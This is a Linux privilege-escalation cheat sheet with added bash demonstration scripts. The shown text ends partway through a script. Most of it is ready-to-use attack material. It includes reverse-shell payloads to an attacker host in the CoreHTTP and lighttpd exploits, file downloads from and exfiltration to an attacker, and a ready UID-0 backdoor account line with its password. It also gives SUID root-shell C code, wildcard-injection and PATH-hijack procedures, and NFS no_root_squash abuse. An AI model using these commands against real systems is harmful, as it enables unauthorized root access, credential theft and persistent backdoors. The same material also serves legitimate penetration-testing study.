Privilege Escalation - Linux
Privilege escalation (vertical privilege escalation) means elevating access from a limited user to a more privileged one by abusing misconfigurations, design flaws and features of the Linux operating system.
OS Information
- File System Layout Reference: https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard
- Command: cat /proc/version; uname -a; uname -mrs;rpm -q kernel;dmesg | grep Linux; ls /boot | grep vmlinuz-
- Info: Prints out kernel information
- Info: After identifying kernel version and OS version use searchsploit to find available exploits
- Command: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /tmp/exploit_suggester.sh
- Info: linux-exploit-suggester.sh is a script that can automate the process of identifying available exploits
- Compiling Exploits
- Command: gcc file.c -o file -static
- Info: You can compile things statically (all dependencies/libraries are within the file) with gcc file.c -o file -static
- Command: gcc -fPIC -shared -o lib.so lib.c -nostartfiles
- Info: Compiles a position-independent shared library without the C runtime start files (the form used for LD_PRELOAD and shared-library payloads below)
- Reference: https://developers.redhat.com/blog/2018/03/21/compiler-and-linker-flags-gcc/
- Reference: Compiling DirtyCow and making it stable, https://github.com/cheetz/dirtycow/blob/master/THP-Lab
- Command: hostname
- Command: dnsdomainname
- Command: ifconfig -a
- Info: List all networking interfaces
- Command: arp -e
- Info: Print the ARP cache (neighbouring hosts the box has talked to)
- Command: /sbin/route -nee
- Info: Print the routing table with extended information
- Command: iptables -L
- Command: netstat -ant
- Info: Print TCP sockets (listening and established); add -l for listeners only and -p for the owning process
- Command: netstat -anu
- Info: Print UDP sockets
- Command: route
- Info: Print Network Routing Information
- Command: cat /etc/sysconfig/network /etc/networks /etc/sysconfig/dhcpd /etc/dhcp/dhcpd.conf /etc/resolv.conf
- Command: find -name ".htaccess" | xargs -r cat
- Command: find -name ".htpasswd" | xargs -r cat
- Command: mount; df -h; cat /etc/fstab
- Info: List mounted file systems and what fstab would mount; if an unmounted or extra file system is found, mount it and restart the enumeration against its contents
- Networking Pilfering
- Info: Script Scan for open ports on host
- Command: for port in {1..65535}; do (echo > /dev/tcp/<target-ip>/$port) >& /dev/null && echo "Port $port seems to be open"; done
- Command: tcpdump -i <interface> tcp and dst host <ip> and dst port <port>
- Info: Check whether tcpdump is usable (needs root or CAP_NET_RAW); if it is, it can capture credentials from the host's own traffic
- Port Forwarding
- Command: ssh -L <local-port>:127.0.0.1:<remote-port> user@<target-ip>
- Info: Local forward, run on the attacker: <local-port> on the attacker reaches <remote-port> on the target's loopback
- Command: ssh -R <attacker-port>:127.0.0.1:<target-port> root@<attacker-ip>
- Info: Remote forward, run on the target: <attacker-port> on the attacker reaches <target-port> on the target's loopback, exposing an internal service without inbound access to the target
- Reference: https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/localport-forward/
- Command: mknod backpipe p; nc -l -p <bind-port> 0<backpipe | nc <attacker-ip> <port-forward> 1>backpipe
- Info: netcat relay through a named pipe: anything arriving on <bind-port> is forwarded to <attacker-ip>:<port-forward> and replies flow back through backpipe
- Command: mknod backpipe p; nc -l -p <bind-port> 0<backpipe | tee -a inflow | nc localhost <port-forward> | tee -a outflow 1>backpipe &
- Info: Same relay to a local port, logging both directions to inflow/outflow and backgrounded
- Tunneling
- Command: sshuttle -r username@<target-ip> <target-network>/24
- Command: sshuttle --dns -vvr username@<target-ip> 0/0
- Info: sshuttle tunnels TCP traffic (and with --dns, DNS lookups) from the attacker over SSH through the target without needing SOCKS-aware clients; 0/0 routes everything through the tunnel
- Reference: https://www.ivoidwarranties.tech/posts/pentesting-tuts/pivoting/sshuttle/
- Command: ssh -D 127.0.0.1:9050 -N user@<pivot-ip>
- Info: Run on the attacker: opens a SOCKS proxy on the attacker's 127.0.0.1:9050 whose connections exit through the pivot host; 9050 is the default port in the proxychains configuration
- Reference: https://github.com/rofl0r/proxychains-ng
- Reference: https://artkond.com/2017/03/23/pivoting-guide/
- Establishing Remote Shell
- Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- Reference: https://highon.coffee/blog/reverse-shell-cheat-sheet/
- File Transfer
- Command: find / -name wget
- Command: find / -name netcat*
- Command: find / -name tftp*
- Command: find / -name ftp
- Command: wget http://<attacker-ip>/file -O /tmp/file
- Command: curl http://<attacker-ip>/file -o /tmp/file
- Command: nc -w 10 <destination-ip> <port> < <file>
- Command: nc -lvp <port> > <file>
- Info: Send a file with the first netcat command and receive it with the second (start the listener first)
- Command: whoami
- Command: sudo -l
- Info: List the commands the current user may run through sudo, as which users, and whether a password is required
- Command: groups
- Info: Prints assigned groups
- Command: w
- Info: List other logged on users
- Command: last
- Info: Prints last logged on users
- Command: cat /etc/passwd | cut -d: -f1
- Info: List user names (use -f1,3 to include the UID)
- Command: awk -F: '($3 == "0") {print}' /etc/passwd
- Info: List accounts with UID 0 (root-equivalent); anything other than root is suspicious
- Command: id
- Info: Print User ID
- Info: Trick: if useradd can be run as root, create a user that reuses an existing UID with useradd -o -u <uid> <user> (UID 0 gives a second root account)
- Command: find / -perm -u=s -type f | xargs -r ls -la
- Command: cat /etc/profile /etc/bashrc ~/.bash_profile ~/.bashrc ~/.bash_logout
- Command: env
- Command: set
- Info: Prints User Environment Variables Configured On System
- Info: Run a command as another user
- Command: sudo -u <username> <command>
- Understanding Hash Formats
- Reference: https://www.aychedee.com/2012/03/14/etc_shadow-password-hash-formats/
- $1$ = md5crypt
- $2a$ = bcrypt (Blowfish-based)
- $2y$ = bcrypt with the corrected handling of 8-bit characters
- $5$ = sha256crypt
- $6$ = sha512crypt
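The checks above (UID-0 accounts, empty password fields, which hash scheme each account uses) written as small functions over passwd/shadow text. This is an added example, not code from the original page; the sample passwd and shadow content is constructed, and the functions can be pointed at a real host with "$(cat /etc/passwd)" and "$(cat /etc/shadow)". The scheme table includes $2b$ and $y$ (yescrypt), which are not listed above but appear on current systems.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: the same checks the commands above
# perform by hand (UID-0 accounts, empty password fields, hash scheme per user),
# written as functions over passwd/shadow text so they run offline on the
# constructed sample below. Point them at real files with "$(cat /etc/passwd)".

# Constructed sample data, not from any real host.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backdoor:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob::1001:1001:Bob:/home/bob:/bin/bash'

SAMPLE_SHADOW='root:$6$saltsalt$fakehashfakehashfakehash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
backdoor:$1$abcdefgh$fakemd5hash:18000:0:99999:7:::
alice:$2y$10$fakebcryptsaltandhash:18000:0:99999:7:::
bob::18000:0:99999:7:::'

# Accounts whose UID (field 3) is 0; anything besides root is a second root.
uid0_accounts() {
    printf '%s\n' "$1" | awk -F: '$3 == 0 { print $1 }'
}

# Accounts whose password field (field 2) is empty: no password is asked for.
# Works on passwd text and on shadow text alike.
empty_password_accounts() {
    printf '%s\n' "$1" | awk -F: '$2 == "" { print $1 }'
}

# Map a crypt(3) hash to its scheme by the $id$ prefix listed above.
hash_algorithm() {
    case "$1" in
        '')                       echo empty ;;
        '*'|'!'*)                 echo locked ;;
        '$1$'*)                   echo md5crypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*)  echo bcrypt ;;
        '$5$'*)                   echo sha256crypt ;;
        '$6$'*)                   echo sha512crypt ;;
        '$y$'*)                   echo yescrypt ;;
        *)                        echo unknown ;;
    esac
}

# "user scheme" for every shadow entry, so weak or empty hashes stand out.
shadow_hash_report() {
    printf '%s\n' "$1" | while IFS=: read -r user hash rest; do
        printf '%s %s\n' "$user" "$(hash_algorithm "$hash")"
    done
}

echo "UID 0 accounts:  $(uid0_accounts "$SAMPLE_PASSWD" | tr '\n' ' ')"
echo "Empty passwords: $(empty_password_accounts "$SAMPLE_PASSWD" | tr '\n' ' ')"
shadow_hash_report "$SAMPLE_SHADOW"
```

On the sample this reports backdoor as a second UID-0 account, bob as passwordless, and backdoor's hash as md5crypt, the scheme worth feeding to a cracker first.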
- Search For Creds On File System
- Command: ./LinEnum.sh -t -k password
- Info: LinEnum is a script that enumerates weaknesses in a Linux system that may allow privilege escalation; -t runs the thorough checks and -k greps files for the given keyword
- Reference: https://github.com/rebootuser/LinEnum
- Command: cat ~/.*_history
- Command: cat /etc/pam.d/system-auth
- Info: Check if Password Lockout Policy Set
- Command: cat /var/apache2/config.inc /var/lib/mysql/mysql/user.MYD /root/anaconda-ks.cfg
- Info: Creds Stored in Scripts/Database files
- Command: cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
- Info: Use grep -i to search for specific strings "passw" "user"
- Command: find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'
- Info: Credentials stored in a Joomla CMS configuration (single quotes keep the shell from expanding $password)
- Command: cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
- Info: Creds possible stored in mail
- Command: ls -al ~/.ssh/authorized_keys
- Command: ls -al /etc/ssh/
- Info: Check to see if SSH authorized keys are available
- Info: Use ssh -i <private-key> user@host to authenticate with a key found on the box
- Creds Stored in Memory
- Command: ps -ef
- Info: List Process and look for Session oriented Services, such as ssh or ftp, and make note of its pid
- Command: gdb -p <pid of service>
- Info: Launch gdb and attach it to the specified pid
- Command: gdb> info proc mappings
- Info: Prints the mapped address ranges; note the start and end addresses of the [heap] mapping
- Command: gdb> dump memory /tmp/mem <start-address> <end-address>
- Info: Dumps that range to a file; run strings on the dump and grep it for credentials
Hacking The File System
- Search for World Writable Directories Or Files
- Command: find / -writable -type d 2>/dev/null
- Info: Directories writable by the current user
- Command: find / -perm -222 -type d 2>/dev/null
- Info: Directories writable by owner, group and others
- Command: find / -perm -o=w -type d 2>/dev/null
- Info: World-writable directories
- Command: find / -perm -o=x -type d 2>/dev/null
- Info: World-executable (searchable) directories
- Command: find / \( -perm -o=w -a -perm -o=x \) -type d 2>/dev/null
- Info: World-writable and executable directories
- Command: find / -xdev -type f -perm -0002 -print 2>/dev/null
- Info: World-writable files (scripts or configs here that root runs or reads are direct escalation paths)
- Command: find /dir -xdev \( -nouser -o -nogroup \) -print
- Info: Files with no valid owner or group (orphaned UID/GID; a new account given that UID would own them)
- Search For SUID Binaries
- Command: find / -user root -perm -4000 -print 2>/dev/null
- Command: find / -perm -u=s -type f 2>/dev/null
- Command: find / -user root -perm -4000 -exec ls -ldb {} \;
- Info: Common SUID Binaries that can be used to escalate to root
- Info: In addition these commands can be used to escape restricted shell
- Info: AWK
- Command: awk 'BEGIN {system("/bin/bash")}'
- Info: bash -p keeps the effective (SUID) uid instead of dropping to the real uid, so a SUID bash gives a root shell
- Command: bash -p
- Info: NMAP
- Command: echo "os.execute('/bin/bash')" > x.nse
- Command: nmap --script=x.nse
- Command: nmap -V
- Info: Check the version first; --interactive only exists in old releases (2.02 to 5.21)
- Command: nmap --interactive
- Info: From the interactive prompt execute !sh
- Info: FIND
- Command: find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \; -quit
- Info: The ; must be escaped from the shell; -quit stops after the first match so only one shell is spawned
- Info: LESS
- Command: less /etc/shadow
- Info: After reading a file using less execute !/bin/bash
- Info: MORE
- Command: more /etc/shadow
- Info: After reading a file using more execute !/bin/bash
- Info: MAN
- Command: man ping
- Info: From inside the pager showing the manual execute !/bin/bash
- Info: VI
- Command: vim /etc/passwd
- Info: From vim's normal mode type :!/bin/bash (or :shell)
- Info: Python one-liner (echo by itself only prints text; os.system belongs to Python)
- Command: python -c "import os; os.system('/bin/bash')"
- Info: SH
- Command: /bin/sh -i
- Info: Python
- Command: python -c "import pty;pty.spawn('/bin/bash');"
- Info: Ruby
- Command: echo "exec '/bin/bash';" > /tmp/root.rb
- Command: ruby /tmp/root.rb
- Info: PERL
- Command: echo "exec '/bin/bash';" > /tmp/root.pl
- Command: perl /tmp/root.pl
- Command: perl -e 'exec "/bin/bash";'
- Info: LUA
- Command: echo "os.execute('/bin/bash')" > /tmp/root.lua
- Command: lua /tmp/root.lua
- Info: TCPDUMP
- Command: echo $'id\n /bin/bash' > /tmp/.shell
- Command: chmod +x /tmp/.shell
- Command: sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root
- Info: -G 1 -W 1 rotates the capture after one second, -z runs our script on the rotated file and -Z root keeps root privileges for it
- Info: BUSYBOX
- Command: /bin/busybox telnetd -l /bin/bash -p 9999
- Info: Starts a telnet listener on port 9999 whose login program is bash; connect with telnet <ip> 9999
- Info: NANO
- Command: nano /etc/passwd
- Info: If nano runs as root, add the following line to create a backdoor account with UID 0 (a hash placed in the passwd field is used instead of the shadow entry): backdoor:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
- Info: This creates the user backdoor with the password test
- Info: CP
- Command: cp /etc/shadow /etc/shadow.bak
- Command: cp -rf shadow /etc/shadow
- Info: If cp runs as root, cp -rf can overwrite protected files: copy a crafted shadow (with a hash you know) over /etc/shadow after backing up the original
- Info: HT
- Info: ht is a hex editor that, when run as root, can be used to modify files such as /etc/sudoers
- Reference: http://hte.sourceforge.net/readme.html
- Reference: http://theevilbit.blogspot.com/2013/11/kioptrix-level-3-walkthrough.html
- Info: MV
- Command: mv /etc/shadow /etc/shadow.bak
- Command: mv shadow /etc/shadow
- Info: mv can be used the same way to replace a protected file with a crafted one (a spoofed shadow file)
- Info: NC
- Command: nc -lvp 80 > server_passwd
- Command: wget 127.0.0.1 --post-file /etc/passwd
- Info: If wget runs as root (sudo), --post-file sends a protected file to the listener; start the nc listener first
- Info: MOUNT
- Command: mount -o bind /bin/bash /bin/mount
- Command: mount
- Info: If mount can be run as root (sudo), bind bash over the mount binary; the next privileged invocation of mount runs bash
- Reference: https://gtfobins.github.io/
- Info: GTFOBins lists Unix binaries that can be abused to spawn shells, read or write files and escalate privileges when they are SUID or runnable through sudo
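A helper that combines the SUID search above with a check against the shell-capable programs this section lists. This is an added example, not code from the original page or from GTFOBins; it assumes GNU find (for -printf) and uses a hand-picked list of names rather than the full GTFOBins index. The fixture tree is constructed so the functions can be exercised without root.

```shell
#!/usr/bin/env bash
# Added example, not from the original page or from GTFOBins: find SUID files
# under a directory and flag those whose name is on a hand-picked list of
# programs the section above shows spawning shells. Assumes GNU find (-printf).
# The list is an illustrative subset, not the full GTFOBins index.

SHELL_CAPABLE="awk bash find less more man vim vi nmap python perl ruby lua nano cp mv nc busybox mount tcpdump"

# SUID regular files under $1 as "mode owner path", permission errors hidden.
list_suid() {
    find "$1" -xdev -type f -perm -4000 -printf '%m %u %p\n' 2>/dev/null | sort -k3
}

# The subset of list_suid output whose basename is in SHELL_CAPABLE.
suid_shell_candidates() {
    list_suid "$1" | while read -r mode owner path; do
        name=${path##*/}
        for known in $SHELL_CAPABLE; do
            if [ "$name" = "$known" ]; then
                printf '%s %s %s\n' "$mode" "$owner" "$path"
                break
            fi
        done
    done
}

# Throwaway tree so the functions can be exercised without root: a user may set
# the SUID bit on files they own (it is then SUID to that user, not to root).
make_fixture() {
    dir=$(mktemp -d)
    for f in find vim ls; do
        printf '#!/bin/sh\n' > "$dir/$f"
        chmod 4755 "$dir/$f"
    done
    printf '#!/bin/sh\n' > "$dir/cat"
    chmod 0755 "$dir/cat"             # executable but not SUID: must not appear
    mkdir "$dir/sub"
    printf '#!/bin/sh\n' > "$dir/sub/python"
    chmod 4755 "$dir/sub/python"
    echo "$dir"
}

fixture=$(make_fixture)
echo "SUID files:"; list_suid "$fixture"
echo "Shell-capable SUID files:"; suid_shell_candidates "$fixture"
rm -rf "$fixture"
# On a real host: suid_shell_candidates /
```

On the fixture, list_suid reports four files and suid_shell_candidates narrows them to find, vim and python; ls is SUID but not on the list, and cat is not SUID. On a real host the owner column matters: a SUID file owned by a non-root user only escalates to that user.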
- Hijacking Installed Programs
- Leveraging Symlinks
- Info: Symlinks redirect a privileged program's file access to a restricted file, or to a path we control, so we can read, overwrite or execute what we choose
- Command: ln -s <path-to-target-file> <link-name>
- Command: In PHP: symlink("/", "./symroot");
- Hijack a program called by a setuid binary with an exported bash function
- Command: function <path-to-program> () { /bin/bash; }
- Command: export -f <path-to-program>
- Command: Execute the setuid program that calls <path-to-program>
- Info: Only works when the program is invoked through a bash that imports functions from the environment; current bash ignores imported functions in privileged (setuid) mode, so expect this only on old or misconfigured systems
- Poisoning PATH
- Info: A . (current directory) or any writable directory in PATH makes programs called by bare name resolve to files we plant there
- Info: Spoof a binary such as ls and get an elevated user (or a root cron job/script) to run it from a directory where the fake is found first
- Command: echo "/bin/bash" > ls
- Command: chmod +x ls
- Command: export PATH=.:$PATH
- Info: Once ls is executed by the elevated user, bash is called instead
- Info: After abusing PATH, reset it so ordinary commands resolve again
- Command: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- Command: export TERM=xterm
- Command: export SHELL=bash
- Control Execution Flow
- Info: If a script or program is calling another binary, we can hijack its path to execute an arbitrary command
- Command: cd /tmp
- Command: echo "/bin/bash" > <name-of-program>
- Command: chmod +x <name-of-program>
- Command: export PATH=/tmp:$PATH
- Command: navigate back to the script or program and execute it
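The PATH hijack from the two procedures above, reproduced end to end in a scratch directory. This is an added example, not code from the original page; the victim script (backup.sh calling ls by bare name) is constructed, and the run needs no root. Against a real SUID, sudo or cron victim the fake binary would run with that victim's privileges.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: reproduce the PATH hijack above in a
# scratch directory as an unprivileged user. A "victim" script calls ls by bare
# name; a directory we control, placed at the front of PATH, supplies a fake ls
# that records proof of execution and then runs the real one so nothing looks
# wrong. Against a real SUID/sudo/cron victim the fake runs with its privileges.

# Victim script (constructed): the flaw being exploited is the unqualified `ls`.
make_victim() {
    cat > "$1/backup.sh" <<'EOF'
#!/bin/sh
ls /tmp > /dev/null
echo backup-done
EOF
    chmod 755 "$1/backup.sh"
}

# Plant a fake ls in $1 that appends a record to $2, then execs the real ls.
plant_fake_ls() {
    real_ls=$(command -v ls)
    cat > "$1/ls" <<EOF
#!/bin/sh
echo "hijacked: uid=\$(id -u) argv=\$*" >> "$2"
exec "$real_ls" "\$@"
EOF
    chmod 755 "$1/ls"
}

# Run the victim, with our directory first in PATH when $1 is "yes" (the same
# effect as `export PATH=.:$PATH` issued from inside that directory), and print
# how many times the fake ls was invoked.
run_victim() {
    prepend=$1
    work=$(mktemp -d)
    marker="$work/marker.log"
    make_victim "$work"
    plant_fake_ls "$work" "$marker"
    if [ "$prepend" = yes ]; then
        PATH="$work:$PATH" "$work/backup.sh" > /dev/null
    else
        "$work/backup.sh" > /dev/null
    fi
    count=$(grep -c '^hijacked:' "$marker" 2>/dev/null || true)
    rm -rf "$work"
    echo "${count:-0}"
}

echo "poisoned PATH: fake ls ran $(run_victim yes) time(s)"
echo "clean PATH:    fake ls ran $(run_victim no) time(s)"
```

The poisoned run records exactly one hijack and the victim still prints backup-done, which is why the attack is quiet: the fake hands off to the real binary. The clean run records nothing, showing that the writable directory must actually precede the real location in the victim's PATH.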
- LD_PRELOAD Injection
- Reference: get root payload, https://goo.gl/5Ztwtj
- Command: compile payload, gcc -fPIC -shared -o /tmp/root.so root.c -nostartfiles
- Command: Launch, sudo LD_PRELOAD=/tmp/root.so <program-allowed-by-sudoers>
- Info: The dynamic loader ignores LD_PRELOAD for setuid binaries, so this only works when sudo passes the variable through (env_keep += LD_PRELOAD in sudoers, visible in sudo -l output)
- Shared Library Injection
- Info: Trace a SUID binary to identify a library it tries to load from a path we can write to
- Command: strace /usr/local/bin/<suid-binary> 2>&1 | grep -i -E "open|access|no such file"
- Info: If a shared library is missing, or is searched for in a writable directory, compile an impersonating payload at that path
- Reference: Shared library payload, https://goo.gl/wMeAhV
- Command: Compile payload, gcc -shared -o <path-to-missing-library> -fPIC <path-to-payload.c>
- Abusing Wildcard (*)
- Info: Look for scripts that contain the following commands:
- Chown
- Chmod
- Tar
- Rsync
- Info: Good places to look: cat /etc/crontab and the scripts under /etc/cron.*, for jobs that run these commands with a wildcard inside a directory we can write to
- Chown file reference trick (file owner hijacking)
- Info: Target: a root job running chown -R <user>:<group> * in a directory we can write to
- Info: Create a file we own whose ownership we want applied to everything
- Command: touch .hijack.php
- Info: Create a second file whose name chown will parse as an option
- Command: touch ./--reference=.hijack.php
- Info: When the wildcard expands, chown sees --reference=.hijack.php and gives every file our ownership instead of the intended one
- Chmod file reference trick
- Info: Same idea against chmod -R <mode> *
- Command: touch .hijack.php && chmod 777 .hijack.php
- Command: touch ./--reference=.hijack.php
- Info: Every file in the directory receives the mode of .hijack.php; the mode argument is treated as a file name and ignored
- Tar arbitrary command execution
- Command: echo "cp /bin/bash /tmp/bash && chmod +s /tmp/bash" > shell.sh
- Command: echo "" > "--checkpoint-action=exec=sh shell.sh"
- Command: echo "" > --checkpoint=1
- Command: tar cf archive.tar *
- Rsync arbitrary command execution
- Info: Target: a root job syncing a wildcard source to a remote host; -e names the remote-shell program, so a file called "-e sh shell.c" makes rsync run our script
- Command: echo "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" > shell.c && chmod +x shell.c
- Command: touch ./'-e sh shell.c'
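The tar and chmod injections from this section, reproduced in a scratch directory as the unprivileged user so the mechanics can be confirmed before they are aimed at a root cron job. This is an added example, not code from the original page; it assumes GNU tar and GNU coreutils (chmod --reference, stat -c), and the victim commands `tar cf backup.tar *` and `chmod 600 *` are constructed stand-ins for what a cron job would run.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: reproduce two of the wildcard
# injections above in a scratch directory as the unprivileged user. Requires GNU
# tar and GNU coreutils (chmod --reference, stat -c). The victim commands are
# assumed to be `tar cf backup.tar *` and `chmod 600 *` run inside the directory.

# Scenario 1: tar. Files named like options are expanded by the shell and parsed
# by tar as --checkpoint=1 --checkpoint-action=exec=..., which runs our script.
tar_checkpoint_demo() {
    work=$(mktemp -d)
    marker="$work/payload-ran.txt"
    (
        cd "$work" || exit 1
        echo data > notes.txt
        # Payload. A real attack would copy /bin/bash and set the SUID bit here.
        printf '#!/bin/sh\necho "payload ran as uid $(id -u)" > "%s"\n' "$marker" > shell.sh
        chmod +x shell.sh
        echo "" > "--checkpoint-action=exec=sh shell.sh"
        echo "" > --checkpoint=1
        # The victim's command, exactly as a cron job would run it.
        tar cf backup.tar * > /dev/null 2>&1 || true
    )
    if [ -f "$marker" ]; then result=hijacked; else result=clean; fi
    rm -rf "$work"
    echo "$result"
}

# Scenario 2: chmod. With --reference=FILE present, GNU chmod copies FILE's mode
# to every remaining operand and treats the intended mode ("600") as a file name.
chmod_reference_demo() {
    work=$(mktemp -d)
    (
        cd "$work" || exit 1
        echo secret > creds.txt
        chmod 600 creds.txt
        # Reference file we own, carrying the mode we want applied everywhere.
        echo "" > .hijack
        chmod 777 .hijack
        echo "" > --reference=.hijack
        # The victim's command; it fails on "600" but still processes creds.txt.
        chmod 600 * > /dev/null 2>&1 || true
    )
    mode=$(stat -c '%a' "$work/creds.txt")
    rm -rf "$work"
    echo "$mode"
}

echo "tar checkpoint:    $(tar_checkpoint_demo)"
echo "chmod --reference: creds.txt mode is now $(chmod_reference_demo)"
```

The first scenario reports hijacked because tar executed shell.sh from the checkpoint action; the second leaves creds.txt at mode 777 instead of the intended 600. Both rely only on the job using an unquoted * in a directory the attacker can create files in, which is the condition to grep for in crontab.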
- Attacking Processes And Services
- Command: ps aux | grep root
- Info: List running process running as root
- Command: ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archives/; ls -alh /var/cache/yum/
- Info: Locate installed applications
- Command: pkg_info
- Info: Obtain application version information on OpenBSD, FreeBSD
- Command: dpkg -l
- Info: Obtain application version information on Debian and Ubuntu
- Command: rpm -qa
- Info: Obtain Application Version information on CentOS, OpenSuse, Fedora, RHEL
- Command: find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp; find / -name tcpdump
- Info: Find Interesting programs
- Command: service --status-all
- Info: List running services
- Enumerate Service Logs
- Command: cat /etc/httpd/logs/access_log /var/log/httpd/error.log /var/log/apache2/access_log /var/log/apache2/error_log /var/log/apache/access_log /var/log/auth.log /var/log/chttp.log /var/log/cups/error_log /var/log/dpkg.log /var/log/faillog /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/messages /var/log/secure /var/log/syslog /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/run/utmp /var/webmin/miniserv.log /var/www/logs/access_log
- Command: ls -alh /var/lib/dhcp3/
- Command: ls -alh /var/log/postgresql/
- Command: ls -alh /var/log/proftpd/
- Command: ls -alh /var/log/samba/
- Known Vulnerable Services
- Info: Exim 4.84-3 and lower is vulnerable to a local privilege escalation exploit
- Reference: https://www.exploit-db.com/exploits/39535/
- Command: cat /etc/syslog.conf /etc/chttp.conf /etc/lighttpd.conf /etc/cups/cupsd.conf /etc/inetd.conf /etc/apache2/apache2.conf /etc/my.cnf /etc/httpd/conf/httpd.conf /opt/lampp/etc/httpd.conf
- Info: List service configurations and parse them for weaknesses (credentials, writable document roots or log paths, dangerous options)
- Info: CoreHTTP configuration
- Reference: https://www.exploit-db.com/exploits/10610/
- Command: index.pl?page=`mknod backpipe p && nc <attacker-ipaddress> <listening-port> 0<backpipe | /bin/bash 1>backpipe&`
- Info: URL encode the string above to send a request to the CoreHTTP Server
- Info: lighttpd Web Server
- Reference: https://www.exploit-db.com/exploits/4391/
- Command: wget --referer="<?php system('/bin/bash -i > /dev/tcp/<attacker-ip>/<listening-port> 0<&1 2>&1'); ?>" localhost
- Info: CUPS, Configures CUPS Printing Server's scheduler
- Reference:https://www.exploit-db.com/exploits/41233/
- Info: inetd.conf defines the network programs that inetd launches on demand for incoming connections; check each listed service for vulnerabilities
- Reference: https://docs.oracle.com/cd/E19253-01/816-5174/inetd.conf-4/index.html
- Info: inetd-managed services can be subject to race conditions: inetd is responsible for opening and closing the listening sockets, and a port that is closed late or left open can be bound to by a new connection
- Command: cat /var/log/apache2/access.log
- Info: Contains Web Client Access connections to Ubuntu Apache Web Servers
- Command: cat /var/log/httpd/access_log
- Info: Contains Web Client Access connections to RHEL Web Servers
- Command: cat /etc/my.cnf
- Info: MySQL configuration file
- Command: cat /etc/httpd/conf/httpd.conf
- Info: Apache HTTP Service Configuration File
- Command: cat /opt/lampp/etc/httpd.conf
- Info: LAMP HTTP Service Configuration
- Command: ls -alhR /var/www/
- Command: ls -alhR /srv/www/htdocs/
- Command: ls -alhR /usr/local/www/apache22/data/
- Command: ls -alhR /opt/lampp/htdocs/
- Command: ls -alhR /var/www/html/
- Known Vulnerable Services
- SMB (SambaCry, CVE-2017-7494) affected versions:
- 3.5.0 up to and including 4.4.13 (fixed in 4.4.14)
- 4.5.0 up to and including 4.5.9 (fixed in 4.5.10)
- 4.6.0 up to and including 4.6.3 (fixed in 4.6.4)
- Reference: https://github.com/opsxcq/exploit-CVE-2017-7494
- MySQL Service (using a limited user)
- Command: select sys_exec('whoami');
- Info: Check whether mysqld runs as root; sys_exec comes from the lib_mysqludf_sys UDF and only exists if it has been loaded (or can be loaded with CREATE FUNCTION, which needs the FILE privilege and a writable plugin directory)
- Info: From the limited user create the following shell.c program in /tmp
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* SUID wrapper: once the file is root-owned and SUID, this drops into a root shell */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
- Command: gcc -o /tmp/shell /tmp/shell.c
- Info: Compile the shell.c program
- Command: mysql> select sys_exec('chown root:root /tmp/shell; chmod +s /tmp/shell');
- Info: mysqld (running as root) makes the payload root-owned and sets the SUID bit; chmod +s alone on a file still owned by the limited user would only be SUID to that user. Run /tmp/shell for the root shell
- NFS
- Command: cat /etc/exports
- Info: Look for (rw,sync,no_root_squash)
- Info: If no_root_squash is set, root on a client stays root on the export, so files we create there as root are root-owned on the target and we can escalate privileges; from the attacker, showmount -e <target-ip> lists the exports
- Reference: Use nfsshell and follow https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/
- Info: On the attacker system, as root, execute:
- Command: mkdir /tmp/victim
- Command: mount -o rw,vers=2 <target-ip>:<exported-dir> /tmp/victim
- Command: echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/victim/shell.c
- Command: gcc -o /tmp/victim/shell /tmp/victim/shell.c
- Command: chmod +s /tmp/victim/shell
- Info: Back on the target, run <exported-dir>/shell; it is root-owned with the SUID bit and yields a root shell (the export must not be mounted nosuid on the target)
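A parser for /etc/exports that flags the entries the procedure above can abuse. This is an added example, not code from the original page; the exports content is constructed, the functions handle only the common "path client(options)" syntax, and they treat a missing root_squash/no_root_squash option as the NFS default of root_squash.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: parse /etc/exports text and flag the
# combinations that matter for the attack above: rw together with no_root_squash
# (root on the client stays root on the export) and rw exports open to any
# client (*). Input is passed as a string so it runs on the constructed sample;
# use "$(cat /etc/exports)" on a target. Only the common "path client(opts)"
# syntax is handled; NFS defaults to root_squash when the option is absent.

# Constructed sample, not from a real host.
SAMPLE_EXPORTS='# /etc/exports
/srv/backup   10.0.0.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,sync)
/home         192.168.1.0/24(rw,sync,root_squash)  *(rw,no_root_squash,no_subtree_check)
/srv/tmp      *(rw,sync)'

# Print "path client options", one line per client entry; comments/blanks dropped.
expand_exports() {
    printf '%s\n' "$1" | awk '
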